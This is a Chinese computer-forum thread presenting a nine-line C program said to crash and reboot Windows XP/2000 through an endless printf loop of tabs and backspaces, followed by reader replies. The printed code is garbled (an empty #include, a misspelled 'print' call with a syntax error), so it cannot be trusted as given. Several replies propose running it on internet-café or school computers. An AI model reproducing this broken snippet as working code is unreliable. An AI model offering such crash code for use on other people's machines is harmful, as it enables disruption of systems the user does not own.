计算机技术论坛

QQ登录

只需一步,快速开始

• 欢迎访问 计算机技术论坛-电脑迷与初学者的家园!由于论坛管理严格,新注册会员可能遇到各种问题,无法解决的请发邮件 admin@jsjbbs.cn

9行代码废掉Windows

微软一直声称Windows XP多么多么稳定可靠,但日前一位名为Masaru Tsuchiyama的外国编程爱好者刊出了一小段C语言代码。这一只有9行的小程序如果在Windows XP/2000下运行,则可导致系统完全崩溃,并重新启动。但此程序对其他版本的Windows没有任何影响。这一产生无限循环输出的小程序的代码如下:

#include
  int main( void )
  { 
  for(;;){
       printf( "hung up\t\t\b\b\b\b\b\b" );
       print("hung up\t\t\b\b\b\b\b\b";);
      }
  return 0;
  }
可以在虚拟机中以身试法
dpy111 该用户已被删除
[s:9]真的吗?我可要试试看 哈哈
谁测试了,麻烦把结果与大家分享一下,期待中………
谁敢试啊!在说着代码我也不会用,怎么使用这代码啊
傻子才用自己的机子试,可以去网吧试试啊:lol
{:4_107:}哈哈,回学校搞搞
LS的想法真好!
怎么用,一定好好试试!!
有人试过了吗